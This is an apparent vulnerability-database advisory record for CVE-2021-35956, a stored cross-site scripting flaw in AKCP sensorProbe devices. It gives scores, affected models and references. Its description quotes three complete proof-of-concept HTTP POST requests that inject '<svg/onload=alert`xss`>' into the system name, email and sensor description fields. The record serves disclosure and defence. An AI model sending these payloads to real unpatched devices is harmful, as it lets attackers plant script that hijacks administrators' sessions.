ID

VAR-202106-1093


CVE

CVE-2021-35956


TITLE

AKCP sensorProbe cross-site scripting vulnerability

Trust: 1.2

sources: CNVD: CNVD-2021-46654 // CNNVD: CNNVD-202106-1985

DESCRIPTION

Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.

AKCP sensorProbe is a platform-independent environmental and safety monitoring device from AKCP, a company in the United States. Setup consists of assigning an IP address and connecting to the embedded web server. The web server does not correctly verify client data; an attacker can use this vulnerability to lure users into clicking and executing client-side code that steals their cookie credentials.

1) Stored Cross-Site Scripting via System Settings

POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save

2) Stored Cross-Site Scripting via Email Settings

POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save

3) Stored Cross-Site Scripting via Sensor Description

POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close

_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save

Trust: 1.62

sources: NVD: CVE-2021-35956 // CNVD: CNVD-2021-46654 // VULMON: CVE-2021-35956 // PACKETSTORM: 163343

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

category: ['embedded device'], sub_category: sensor

Trust: 0.1

sources: OTHER: None // CNVD: CNVD-2021-46654

AFFECTED PRODUCTS

vendor: akcp, model: sensorprobe4, scope: lt, version: sp480-20210624

Trust: 1.0

vendor: akcp, model: sensorprobe8-x60, scope: lt, version: sp480-20210624

Trust: 1.0

vendor: akcp, model: sensorprobe2, scope: lt, version: sp480-20210624

Trust: 1.0

vendor: akcp, model: sensorprobe8, scope: lt, version: sp480-20210624

Trust: 1.0

vendor: akcp, model: sensorprobe8-x20, scope: lt, version: sp480-20210624

Trust: 1.0

vendor: akcp, model: sensorprobe <sp480-20210624, scope: -, version: -

Trust: 0.6

sources: CNVD: CNVD-2021-46654 // NVD: CVE-2021-35956

CVSS

SEVERITY

nvd@nist.gov: CVE-2021-35956
value: MEDIUM

Trust: 1.0

CNVD: CNVD-2021-46654
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-202106-1985
value: MEDIUM

Trust: 0.6

VULMON: CVE-2021-35956
value: LOW

Trust: 0.1

CVSSV2

nvd@nist.gov: CVE-2021-35956
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.1

CNVD: CNVD-2021-46654
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CVSSV3

nvd@nist.gov: CVE-2021-35956
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.3
impactScore: 2.7
version: 3.1

Trust: 1.0

sources: CNVD: CNVD-2021-46654 // VULMON: CVE-2021-35956 // CNNVD: CNNVD-202106-1985 // NVD: CVE-2021-35956

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.0

sources: NVD: CVE-2021-35956

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202106-1985

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 163343 // CNNVD: CNNVD-202106-1985

PATCH

title: CVE-2021-35956, url: https://github.com/tcbutler320/CVE-2021-35956

Trust: 0.1

sources: VULMON: CVE-2021-35956

EXTERNAL IDS

db: NVD, id: CVE-2021-35956

Trust: 2.5

db: PACKETSTORM, id: 163343

Trust: 1.8

db: CNVD, id: CNVD-2021-46654

Trust: 0.6

db: EXPLOIT-DB, id: 50080

Trust: 0.6

db: CNNVD, id: CNNVD-202106-1985

Trust: 0.6

db: OTHER, id: NONE

Trust: 0.1

db: VULMON, id: CVE-2021-35956

Trust: 0.1

sources: OTHER: None // CNVD: CNVD-2021-46654 // VULMON: CVE-2021-35956 // PACKETSTORM: 163343 // CNNVD: CNNVD-202106-1985 // NVD: CVE-2021-35956

REFERENCES

url:https://tbutler.org/2021/06/28/cve-2021-35956

Trust: 1.8

url:https://www.akcp.com/support-center/customer-login/sensor-probe-firmware-changelog/

Trust: 1.7

url:http://www.akcp.in.th/downloads/firmwares/sp480-20210624.zip

Trust: 1.7

url:http://packetstormsecurity.com/files/163343/akcp-sensorprobe-spx476-cross-site-scripting.html

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2021-35956

Trust: 1.3

url:https://www.exploit-db.com/exploits/50080

Trust: 0.6

url:https://ieeexplore.ieee.org/abstract/document/10769424

Trust: 0.1

url:https://cwe.mitre.org/data/definitions/79.html

Trust: 0.1

url:https://github.com/tcbutler320/cve-2021-35956

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:http://[target]/mail?time=32e004c941f912

Trust: 0.1

url:http://[target]/senswatr?index=0&time=32e004c941f912

Trust: 0.1

url:http://[target]

Trust: 0.1

url:https://www.akcp.com/

Trust: 0.1

url:https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/

Trust: 0.1

url:http://[target]/system?time=32e004c941f912

Trust: 0.1

sources: OTHER: None // CNVD: CNVD-2021-46654 // VULMON: CVE-2021-35956 // PACKETSTORM: 163343 // CNNVD: CNNVD-202106-1985 // NVD: CVE-2021-35956

CREDITS

Tyler Butler

Trust: 0.1

sources: PACKETSTORM: 163343

SOURCES

db: OTHER, id: -
db: CNVD, id: CNVD-2021-46654
db: VULMON, id: CVE-2021-35956
db: PACKETSTORM, id: 163343
db: CNNVD, id: CNNVD-202106-1985
db: NVD, id: CVE-2021-35956

LAST UPDATE DATE

2025-01-30T19:49:00.537000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2021-46654, date: 2021-07-02T00:00:00
db: VULMON, id: CVE-2021-35956, date: 2021-07-06T00:00:00
db: CNNVD, id: CNNVD-202106-1985, date: 2021-07-07T00:00:00
db: NVD, id: CVE-2021-35956, date: 2021-07-06T13:20:33.377

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2021-46654, date: 2021-07-02T00:00:00
db: VULMON, id: CVE-2021-35956, date: 2021-06-30T00:00:00
db: PACKETSTORM, id: 163343, date: 2021-07-02T15:30:25
db: CNNVD, id: CNNVD-202106-1985, date: 2021-06-30T00:00:00
db: NVD, id: CVE-2021-35956, date: 2021-06-30T12:15:07.683